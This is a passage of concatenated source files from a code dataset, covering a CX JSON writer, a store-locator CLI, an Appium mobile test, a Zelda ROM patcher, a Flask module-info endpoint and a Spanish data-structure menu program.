self.__in_fragment = False\n\n def add_pre_meta_data(self, pre_meta_data):\n if pre_meta_data is None:\n raise AssertionError('pre meta data must not be none')\n if self.__ended:\n raise IOError('already ended')\n if self.__started:\n raise IOError('already started')\n self.__add_meta_data(self.__pre_meta_data, pre_meta_data)\n\n def add_post_meta_data(self, post_meta_data):\n if post_meta_data is None:\n raise AssertionError('post meta data must not be none')\n if self.__ended:\n raise IOError('already ended')\n self.__add_meta_data(self.__post_meta_data, post_meta_data)\n\n def start(self):\n if self.__ended:\n raise IOError('already ended')\n if self.__started:\n raise IOError('already started')\n self.__started = True\n self.__out.write('[')\n if len(self.__pre_meta_data) > 0:\n self.__write_meta_data(self.__pre_meta_data)\n\n def end(self):\n if self.__ended:\n raise IOError('already ended')\n if not self.__started:\n raise IOError('not started')\n if self.__fragment_started:\n raise IOError('fragment not ended')\n if len(self.__post_meta_data) > 0:\n self.__write_meta_data(self.__post_meta_data)\n self.__ended = True\n self.__started = False\n self.__out.write('\\n')\n self.__out.write(']')\n\n def start_aspect_fragment(self, aspect_name):\n if aspect_name is None:\n raise AssertionError('aspect name data must not be none')\n if self.__ended:\n raise IOError('already ended')\n if not self.__started:\n raise IOError('not started')\n if self.__fragment_started:\n raise IOError('fragment already started')\n self.__fragment_started = True\n if self.__first:\n self.__first = False\n else:\n self.__out.write(', ')\n self.__out.write('\\n')\n self.__out.write(' { ')\n self.__out.write('\"')\n self.__out.write(aspect_name)\n self.__out.write('\"')\n self.__out.write(':')\n self.__out.write(' ')\n self.__out.write('[')\n self.__out.write(' ')\n self.__out.write('\\n')\n\n def end_aspect_fragment(self):\n if self.__ended:\n raise IOError('already ended')\n if not self.__fragment_started:\n raise IOError('fragment not started')\n self.__fragment_started = False\n self.__out.write(' ')\n self.__out.write(']')\n self.__out.write('\\n')\n self.__out.write(' }')\n self.__in_fragment = False\n\n def write_aspect_element(self, element):\n if self.__ended:\n raise IOError('already ended')\n if not self.__fragment_started:\n raise IOError('fragment not started')\n if self.__in_fragment is True:\n self.__out.write(', ')\n self.__out.write('\\n')\n self.__out.write(' ')\n self.__out.write(self.__aspect_element_to_json(element))\n self.__in_fragment = True\n my_name = element.get_name()\n if my_name not in self.__aspect_element_counts:\n self.__aspect_element_counts[my_name] = 1\n else:\n self.__aspect_element_counts[my_name] += 1\n\n def __write_meta_data(self, meta_data):\n self.start_aspect_fragment(CxConstants.META_DATA)\n for e in meta_data:\n self.write_aspect_element(e)\n self.end_aspect_fragment()\n\n def get_aspect_element_counts(self):\n return self.__aspect_element_counts\n\n @staticmethod\n def __aspect_element_to_json(aspect_element):\n return json.dumps(aspect_element.get_data(), cls=DecimalEncoder)\n\n @staticmethod\n def __add_meta_data(meta_data, add_me):\n if isinstance(add_me, collections.Iterable):\n meta_data.extend(add_me)\n else:\n meta_data.append(add_me)\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n return super(DecimalEncoder, self).default(o)\n\n\n","sub_path":"cxio/cx_writer.py","file_name":"cx_writer.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"281126255","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nimport logging\n\nfrom store import search_store\n\n\ndef get_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--zip\", type=int, help=\"Find nearest store to this zip code. If there are multiple best-matches, return the first.\")\n\tparser.add_argument(\"--address\", type=str, help=\"Find nearest store to this address. If there are multiple best-matches, return the first.\")\n\tparser.add_argument(\"--output\", type=str, help=\"Output in human-readable text, or in JSON (e.g. machine-readable) [default: text]\", default='text')\n\tparser.add_argument(\"--units\", type=str, help=\"Display units in miles or kilometers [default: mi]\", default='mi')\n\targs = parser.parse_args()\n\n\tif args.zip is None and args.address is None:\n\t\tlogging.error(\"You need to request at least one location parameter: zip or address.\")\n\t\treturn None\n\n\tif args.units not in [\"mi\", \"km\"]:\n\t\tlogging.error(\"Please, specify correct unit formate. Available formates: 'km' and 'mi'.\")\n\t\treturn None\n\n\tif args.output not in [\"text\", \"json\"]:\n\t\tlogging.error(\"Please, specify correct output formate. Available formates: 'text' and 'json'.\")\n\t\treturn None\n\n\treturn args\n\n\ndef main():\n\targs = get_arguments()\n\trecord = search_store(args.address or args.zip, args.google_api_key)\n\tif not record:\n\t\treturn\n\n\tprint_output(record, args.output, args.units)\n\n# function for printing the output in requested formate\n# default: text Here's the nearest store details:\n# \t\t\t\t\tstore name: San Francisco West, \n# \t\t\t\t\tstore address: SEC Geary Blvd. and Masonic Avenue 2675 Geary Blvd San Francisco CA 94118-3400,\n# \t\t\t\t\tdistance from requested address: 1.449589mi\n# optional: json {\"store_name\": \"San Francisco West\", \"store_location\": \"SEC Geary Blvd. and Masonic Avenue\", \n# \t\t\t\t\t\"address\": \"2675 Geary Blvd\", \"city\": \"San Francisco\", \"state\": \"CA\", \"zip_code\": \"94118-3400\", \n#\t\t\t\t\t\"latitude\": \"37.7820964\", \"longitude\": \"-122.4464697\", \"county\": \"San Francisco County\", \n#\t\t\t\t\t\"distance\": 1.4495892592265038}\ndef print_output(record, output, units):\n\t[column_names, distance, store] = record\n\t# coeficient to convert km to mi\n\tkm_to_miles = 0.621371\n\tdistance = distance if units == \"km\" else distance * km_to_miles\n\tif output == 'text':\n\t\tprint('Here\\'s the nearest store details:\\n store name: %s, \\n store address: %s, \\\n\t\t\t\\n distance from requested address: %f%s' %(store[0], ' '.join(store[1:6]), distance, units))\n\telse:\n\t\tresult = {column_names[i].lower().replace(' ', '_') : store[i] for i in range(len(column_names))}\n\t\tresult['distance'] = distance\n\t\tresult['units'] = units\n\t\tresult_json = json.dumps(result)\n\t\tprint (result_json)\n\n\nif __name__== \"__main__\":\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"446801063","text":"# -*- coding:utf-8 -\n\nfrom appium import webdriver\n\nimport time\nfrom Appium_ import testFordata\n\nimport os\n\n\n#获取app的相关参数,测试准备\ndesired_caps = testFordata.readyForTest()\n\n\ndef test():\n driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps) # 启动Remote RPC\n \n try:\n \n time.sleep(5) #确保休眠,跳转到那个界面\n driver.find_element_by_id('com.pingan.mifi:id/tv_enjoy').click()\n driver.find_element_by_id('com.pingan.mifi:id/edittext').send_keys('17091640310')\n time.sleep(1)\n driver.find_element_by_id('com.pingan.mifi:id/et_password').send_keys('3507')\n \n os.system('adb shell input keyevent 4')#返回键,退出虚拟键盘\n \n time.sleep(2)\n driver.find_element_by_id('com.pingan.mifi:id/btn_fast_login').click()\n # textfields.send_keys('17091640310')\n \n time.sleep(2)\n os.system('adb shell input keyevent 4') # 返回键,退出虚拟键盘\n #切换音频\n driver.find_element_by_id('com.pingan.mifi:id/tv_music').click()\n time.sleep(2)\n # 切换到服务\n driver.find_element_by_id('com.pingan.mifi:id/tv_redPaper').click()\n time.sleep(2)\n # 切换我的\n driver.find_element_by_id('com.pingan.mifi:id/tv_mine').click()\n \n \n except Exception as e:\n testFordata.logger.cri(e)\n testFordata.logger.cri('Appium出现错误!!')\n driver.quit()\n \n\ntest()","sub_path":"Appium_/testMIFI.py","file_name":"testMIFI.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"474232982","text":"import itertools\r\nfrom .exceptions import alttprException\r\n\r\n\r\ndef apply(rom, patches):\r\n \"\"\"Applies a patch, which is a list of dictionaries\r\n\r\n Arguments:\r\n rom {list} -- A list of bytes depicting the ROM data to be patched.\r\n patches {list} -- A list of dictionaries that depict of set of patches to be applied to the ROM.\r\n\r\n Returns:\r\n list -- a list of bytes depicitng the patched rom\r\n \"\"\"\r\n for patch in patches:\r\n offset = int(list(patch.keys())[0])\r\n patch_values = list(patch.values())[0]\r\n for idx, value in enumerate(patch_values):\r\n rom[offset + idx] = value\r\n return rom\r\n\r\ndef heart_speed(speed='half'):\r\n \"\"\"Set the low-health warning beep interval.\r\n\r\n Keyword Arguments:\r\n speed {str} -- Chose the speed at which the low health warning beeps.\r\n Options are 'off', 'double', 'normal', 'half', and 'quarter'. (default: {'half'})\r\n\r\n Returns:\r\n list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n \"\"\"\r\n if speed is None:\r\n speed = 'normal'\r\n sbyte = {\r\n 'off': 0,\r\n 'double': 16,\r\n 'normal': 32,\r\n 'half': 64,\r\n 'quarter': 128,\r\n }\r\n patch = [{\r\n '1572915': [sbyte[speed]]\r\n }]\r\n return patch\r\n\r\ndef heart_color(color='red'):\r\n \"\"\"Set the color of the hearts on the player's HUD.\r\n\r\n Keyword Arguments:\r\n color {str} -- The heart color. Options are 'red', 'blue', 'green', and 'yellow' (default: {'red'})\r\n\r\n Returns:\r\n list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n \"\"\"\r\n\r\n if color is None:\r\n color = 'red'\r\n cbyte = {\r\n 'blue': [44, 13],\r\n 'green': [60, 25],\r\n 'yellow': [40, 9],\r\n 'red': [36, 5],\r\n }\r\n byte = cbyte[color][0]\r\n file_byte = cbyte[color][1]\r\n patch = [\r\n {'457246': [byte]},\r\n {'457248': [byte]},\r\n {'457250': [byte]},\r\n {'457252': [byte]},\r\n {'457254': [byte]},\r\n {'457256': [byte]},\r\n {'457258': [byte]},\r\n {'457260': [byte]},\r\n {'457262': [byte]},\r\n {'457264': [byte]},\r\n {'415073': [file_byte]},\r\n ]\r\n return patch\r\n\r\ndef music(music=True):\r\n \"\"\"Enables, or disables, the in-game music. Useful if you want to use an MSU-1 soundtrack instead.\r\n\r\n Keyword Arguments:\r\n music {bool} -- If true, music is enabled. If false, the music id disabled. (default: {True})\r\n\r\n Returns:\r\n list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n \"\"\"\r\n\r\n return [{'1573402': [0 if music else 1]}]\r\n\r\n\r\ndef quickswap(quickswap=False):\r\n return [{'1572939': [1 if quickswap else 0]}]\r\n\r\n\r\ndef menu_speed(speed='normal'):\r\n if speed is None:\r\n speed = 'normal'\r\n sbyte = {\r\n 'instant': 0xE8,\r\n 'fast': 0x10,\r\n 'normal': 0x08,\r\n 'slow': 0x04\r\n }\r\n patch = [\r\n {'1572936': [sbyte[speed]]},\r\n {'449946': [0x20 if menu_speed == 'instant' else 0x11]},\r\n {'450346': [0x20 if menu_speed == 'instant' else 0x12]},\r\n {'450793': [0x20 if menu_speed == 'instant' else 0x12]}\r\n ]\r\n return patch\r\n\r\ndef sprite(spr):\r\n \"\"\"Creates a patch for to replace Link's sprite with the contents of a XSPR or SPR file.\r\n\r\n Arguments:\r\n spr {list} -- a list of bytes that depicts a ZSPR or SPR file\r\n\r\n Returns:\r\n list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n \"\"\"\r\n\r\n if spr[:4] == [90, 83, 80, 82]:\r\n # stolen from VT's code\r\n gfx_offset = spr[12] << 24 | spr[11] << 16 | spr[10] << 8 | spr[9]\r\n palette_offset = spr[18] << 24 | spr[17] << 16 | spr[16] << 8 | spr[15]\r\n patch = [\r\n {'524288': spr[gfx_offset:gfx_offset + 28671]},\r\n {'905992': spr[palette_offset:palette_offset + 120]},\r\n {'912885': spr[palette_offset + 120:palette_offset + 120 + 3]}\r\n ]\r\n # Else treat it like a SPR file instead\r\n else:\r\n patch = [\r\n {'524288': spr[0:28671]},\r\n {'905992': spr[28672:28791]},\r\n {\r\n '912885': [\r\n spr[28726],\r\n spr[28727],\r\n spr[28756],\r\n spr[28757],\r\n ]\r\n }\r\n ]\r\n return patch\r\n\r\ndef checksum(rom):\r\n \"\"\"Writes a patch that fixes a ROM's checksum. This should be the last patch applied to a ROM before it is written.\r\n\r\n Arguments:\r\n rom {list} -- a list of bytes depicitng the rom\r\n\r\n Returns:\r\n list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n \"\"\"\r\n\r\n sum_of_bytes = sum(rom[:32731]) + sum(rom[32736:])\r\n checksum = (sum_of_bytes + 510) & 65535\r\n inverse = checksum ^ 65535\r\n patch = [\r\n {\r\n '32732': [\r\n inverse & 255,\r\n inverse >> 8,\r\n checksum & 255,\r\n checksum >> 8,\r\n ]\r\n }\r\n ]\r\n return patch\r\n\r\ndef expand(rom, newlenmb):\r\n \"\"\"Expands the byte list of a ROM to the specified number of megabytes, filling in the new space with zeroes.\r\n\r\n Arguments:\r\n rom {list} -- a list of bytes depicitng the rom\r\n\r\n Keyword Arguments:\r\n newlenmb {int} -- The size of the ROM should be, in megabytes.\r\n\r\n Raises:\r\n alttprException -- Raised if the new length is shorter than the current size of the byte list.\r\n\r\n Returns:\r\n list -- a list of bytes depicitng the rom\r\n \"\"\"\r\n\r\n newlen = int(newlenmb) * 1024 * 1024\r\n if len(rom) > newlen:\r\n raise alttprException('ROM is already larger than {bytes}'.format(\r\n bytes=newlen\r\n ))\r\n diff = len(rom) - newlen\r\n if diff > 0:\r\n rom[newlen] = 0\r\n else:\r\n rom.extend(itertools.repeat(0, -diff))\r\n rom.append(0)\r\n return rom\r\n","sub_path":"pyz3r/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"491437796","text":"\n# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nfrom flask import request\nfrom sqlalchemy import create_engine\n\nfrom AUSYS.log import log\n\nfrom AUUSE.get_user_info_from_key import get_user_info_from_key\nfrom AUUSE.set_user_API_req import set_user_API_req\n\nfrom etc.set_log import set_log\nfrom etc.set_send import set_send\nfrom etc.check_text import check_text\nfrom config.config_set import db_data\n\n# 인식모듈 게시글을 조회하는 함수\n# user_key : API 를 호출하는 사용자의 키\n# log_request : 요청코드(인식모듈 상세정보 조회, 인식모듈 수정 시 정보 호출)\n# module_index : 정보를 조회하려는 인식모듈 게시글의 인덱스\ndef get_module_info(user_key, log_request, module_index):\n\n # 로그를 남기기 위한 값\n # user_ip : API 를 호출한 사용자의 ip\n # user_id : API 를 호출한 사용자의 id\n user_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)\n user_id = None\n # 파이썬의 logging 함수를 불러오는 함수\n logger = set_log()\n # 받아온 user_ip, user_id 를 로그에 추가\n logger_data = {'clientip': user_ip, 'user_id': user_id}\n logger.info(\"Request get_module_info\", extra=logger_data)\n\n request_log = \"get_module_info\"\n\n # 사용자의 마지막 API 변경 함수\n set_user_API_req(user_key, request_log)\n logger.info(\"Request set_user_API_req\", extra=logger_data)\n\n # DB 에 로그를 남기기 위해 입력값, 요청값, api, function 명 등을 정의\n input = {}\n input['user_key'] = user_key\n input['log_request'] = log_request\n input['module_index'] = module_index\n\n api = os.path.split(__file__)[1]\n function = sys._getframe().f_code.co_name\n\n input_list = [user_key, log_request, module_index]\n\n # 입력값에서 디비 또는 API 파라미터에 입력할 수 없는 특수문자가 포함되어 있는 경우\n for input_data in input_list:\n status = check_text(\"input_db\", input_data)\n if status == \"400\":\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"ERROR\"\n output = \"\"\n message = \"Input data include special character\"\n success_flag = \"N\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n result = \"fail\"\n status = \"404\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n # 입력받은 사용자 키를 이용하여 사용자의 아이디, 권한 조회\n send = get_user_info_from_key(user_key)\n logger.info(\"Get user information\", extra=logger_data)\n\n # 접속해있는 사용자가 아닐 경우\n if send['status'] == \"201\":\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"ERROR\"\n output = \"\"\n message = \"User need login\"\n success_flag = \"N\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n result = \"fail\"\n status = \"400\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n # 접속 여부 확인 도중 DB 에러가 난 경우\n elif send['status'] == \"400\":\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"EXCEPTION\"\n output = \"\"\n message = send['data'][0]['error']\n success_flag = \"N\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n result = \"fail\"\n status = \"401\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n # 현재 접속 중인 사용자일 경우\n elif send['status'] == \"200\":\n # 수정을 요청한 사용자와 작성자가 동일한지 확인\n\n # API 를 호출한 사용자 아이디\n user_id = send['data'][0]['result_data_1']\n\n engine = create_engine(db_data)\n connection = engine.raw_connection()\n cursor = connection.cursor()\n\n # 인식모듈 상세정보 조회하는 프로시저 호출\n try:\n # 작성자인지 판단하기 위해 조회하는 것 이므로 조회수 증가하지 않음\n count_click = \"N\"\n cursor.callproc('SP_KEYM_GET_MODULE_DETAILS_INFO', [module_index, count_click])\n\n column_names_list = [x[0] for x in cursor.description]\n\n result_module_info = []\n\n for row in cursor.fetchall():\n result_module_info.append(dict(zip(column_names_list, row)))\n\n # 입력한 인덱스에 해당하는 인식모듈 정보가 존재하지 않을 경우(삭제된 인식모듈을 호출한 경우)\n if not result_module_info:\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"ERROR\"\n output = \"\"\n message = \"Module post does not exist\"\n success_flag = \"N\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message,\n success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n result = \"fail\"\n status = \"405\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n # 초반에 None 으로 설정해뒀던 파일은 N 으로 바꾸어 출력\n for module_info in result_module_info:\n if module_info['FILE_EXIST_FLAG'] is None:\n module_info['FILE_EXIST_FLAG'] = \"N\"\n\n # 인식모듈을 등록한 사용자 ID\n user_id_module = result_module_info[0]['FK_KMMITN_MODULEINFO']\n logger.info(\"Verify that the user and author match\", extra=logger_data)\n\n # 작성자가 동일한지 확인\n if user_id != user_id_module:\n logger.info(\"User and author do not match\", extra=logger_data)\n id_equal_flag = \"N\"\n else:\n logger.info(\"User and author match\", extra=logger_data)\n id_equal_flag = \"Y\"\n\n # 인식모듈을 조회하려는 사용자의 권한 리스트\n user_auth_list = send['data'][0]['AUTH']\n\n request_auth = \"\"\n # 인식모듈 조회 'LGMOD0001'\n if log_request == \"LGMOD0001\":\n request_auth = 'AUMOD0001'\n count_click = \"Y\"\n # 인식모듈 수정 'LGMOD0003'\n elif log_request == \"LGMOD0003\":\n request_auth = 'AUMOD0003'\n count_click = \"N\"\n\n auth_exist_flag = \"\"\n logger.info(\"Check authority\", extra=logger_data)\n # 인식모듈 조회 또는 수정 권한 조회\n for auth in user_auth_list:\n if auth == request_auth:\n logger.info(\"Authority exists\", extra=logger_data)\n auth_exist_flag = \"Y\"\n break\n else:\n auth_exist_flag = \"N\"\n\n # 인식모듈 조회를 요청했을 경우 권한이 없으면 조회 불가\n if log_request == \"LGMOD0001\":\n if auth_exist_flag == \"N\":\n\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"ERROR\"\n output = \"\"\n message = \"You do not have permission\"\n success_flag = \"N\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n result = \"fail\"\n status = \"402\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n # 자격이 있을 경우 조회수 증가\n else:\n # 조회수 증가 후 증가된 값을 호출\n cursor.callproc('SP_KEYM_GET_MODULE_DETAILS_INFO', [module_index, count_click])\n\n column_names_list = [x[0] for x in cursor.description]\n\n result_module_info = []\n\n for row in cursor.fetchall():\n result_module_info.append(dict(zip(column_names_list, row)))\n\n # 인식모듈 수정을 요청헀을 경우 작성자도 아니고 권한도 없을 경우 조회 불가(택1)\n elif log_request == \"LGMOD0003\":\n if id_equal_flag == \"N\" and auth_exist_flag == \"N\":\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"ERROR\"\n output = \"\"\n message = \"You do not have permission\"\n success_flag = \"N\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n result = \"fail\"\n status = \"402\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n result_module_info[0]['id_equal_flag'] = id_equal_flag\n\n data = result_module_info\n\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"REQUEST\"\n output = data\n message = \"get_module_info success\"\n success_flag = \"Y\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.info(message, extra=logger_data)\n logger.debug(log_db, extra=logger_data)\n\n result = \"success\"\n status = \"200\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.debug(send, extra=logger_data)\n\n return send\n\n except Exception as e:\n print(\"error type : \", type(e))\n print(\"error : \", e)\n\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"EXCEPTION\"\n output = \"\"\n message = \"exception error\"\n success_flag = \"Y\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n status = '403'\n result = \"fail\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n finally:\n connection.close()","sub_path":"AUMOD/get_module_info.py","file_name":"get_module_info.py","file_ext":"py","file_size_in_byte":14176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"174776312","text":"from kivy.event import EventDispatcher\nfrom kivy.properties import ListProperty\nfrom kivy.storage.jsonstore import JsonStore\n\n\nclass Storage(EventDispatcher):\n\n store = ListProperty()\n json_store = JsonStore('storage.json')\n\n instants = [\n 'Drink',\n 'Flush',\n 'Washing Clothes',\n 'Other'\n ]\n\n quantity_based = [\n 'Washing Dishes',\n 'Washing Clothes (manually)',\n 'Watering Plants'\n ]\n\n time_based = [\n 'Showering'\n ]\n\n def __init__(self):\n for key in self.json_store.keys():\n entity = self.json_store.get(key)\n self.store.append(entity)\n\n\nstorage = Storage()\n","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"256788251","text":"from Manager import Manager\n\n\ndef start():\n exit = True\n\n while exit:\n\n menu()\n option = get_option()\n exit = execute_menu(option)\n\n\ndef menu():\n print(\"____________Menu principal____________\\n\")\n print(\"1. Agregar datos en una estructura\\n\")\n print(\"2. Mover datos en una estructura\\n\")\n print(\"3. Eliminar datos en una estructura\\n\")\n print(\"4. Mostrar datos de una estructura\\n\")\n print(\"0. Salir\\n\")\n print(\"______________________________________\\n\")\n\n\ndef get_option():\n\n option = input(\"Digite una opcion: \")\n\n return option\n\n\ndef execute_menu(option):\n exit = True\n operation = \"\"\n\n if option == \"1\":\n operation = \"Add\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"2\":\n\n operation = \"Move\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"3\":\n\n operation = \"Delete\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"4\":\n\n operation = \"Show\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"0\":\n\n exit = False\n print(\"Gracias...\")\n\n else:\n print(\"*Opcion invalida*\")\n\n return exit\n\n\ndef add_move_delete_show_menu(operation):\n operation = get_ES_name(operation)\n\n print(\"____________\" + operation + \" datos____________\\n\")\n print(\"1. En una lista\\n\")\n print(\"2. En una pila\\n\")\n print(\"3. En una cola\\n\")\n print(\"4. En un arbol binario\\n\")\n print(\"5. En un arbol AVL\\n\")\n print(\"0. <-\\n\")\n print(\"______________________________________\")\n\n\ndef get_ES_name(operation):\n if operation == \"Add\":\n return \"Agregar\"\n elif operation == \"Move\":\n return \"Mover\"\n elif operation == \"Delete\":\n return \"Eliminar\"\n else:\n return \"Mostrar\"\n\n\ndef execute_add_move_delete_show(option, operation):\n strcuk_type = \"\"\n\n if option == \"1\":\n strcuk_type = \"lista\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"2\":\n strcuk_type = \"pila\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"3\":\n strcuk_type = \"cola\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"4\":\n strcuk_type = \"arbol binario\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"5\":\n strcuk_type = \"arbol AVL\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"0\":\n pass\n\n else:\n print(\"Opcion invalida\")\n\n\ndef execute_operation(operation, struck_type):\n num = 0\n\n if operation == \"Add\" or operation == \"Delete\" or operation == \"Move\":\n\n if operation == \"Add\":\n\n num = get_input()\n print(str(Manager.add_item(num, struck_type)))\n\n elif operation == \"Move\":\n movement_op(struck_type)\n\n else:\n if struck_type == \"lista\" or struck_type == \"arbol binario\" or struck_type == \"arbol AVL\":\n num = get_input()\n print(str(Manager.delete_item(num, struck_type)))\n else:\n num = 0\n print(str(Manager.delete_item(num, struck_type)))\n else:\n print(str(Manager.show_item(struck_type)))\n\n\ndef movement_op(struck_type):\n movement_menu(struck_type)\n option = get_option()\n move_to(option, struck_type)\n\n\ndef movement_menu(struck_type):\n print(\"______________________________________\\n\")\n if struck_type == \"lista\":\n print(\"2. Mover a una pila\\n\")\n print(\"3. Mover a una cola\\n\")\n print(\"4. Mover a un arbol\\n\")\n print(\"5. Mover a un arbol AVL\\n\")\n\n elif struck_type == \"pila\":\n print(\"1. Mover a una lista\\n\")\n print(\"3. Mover a una cola\\n\")\n print(\"4. Mover a un arbol\\n\")\n print(\"5. Mover a un arbol AVL\\n\")\n\n elif struck_type == \"cola\":\n print(\"1. Mover a una lista\\n\")\n print(\"2. Mover a una pila\\n\")\n print(\"4. Mover a un arbol\\n\")\n print(\"5. Mover a un arbol AVL\\n\")\n\n elif struck_type == \"arbol binario\":\n print(\"1. Mover a una lista\\n\")\n print(\"2. Mover a una pila\\n\")\n print(\"3. Mover a una cola\\n\")\n print(\"5. Mover a un arbol AVL\\n\")\n\n elif struck_type == \"arbol AVLvalue, ..., sep, end, file, flush\":\n print(\"1. Mover a una lista\\n\")\n print(\"2. Mover a una pila\\n\")\n print(\"3. Mover a una cola\\n\")\n print(\"4. Mover a un arbol\\n\")\n print(\"______________________________________\")\n\n\ndef move_to(option, struck_type):\n\n print(\"\\n\" + str(Manager.show_item(struck_type)) + \"\\n\")\n print(\"Numeros a mover\\n\")\n num = get_input()\n\n if(Manager.move_item(num, struck_type) is True):\n\n if(option == \"1\"):\n strcuk_typ = \"lista\"\n print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n elif(option == \"2\"):\n strcuk_typ = \"pila\"\n print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n elif(option == \"3\"):\n strcuk_typ = \"cola\"\n print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n elif(option == \"4\"):\n strcuk_typ = \"arbol binario\"\n print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n elif(option == \"5\"):\n strcuk_typ = \"arbol 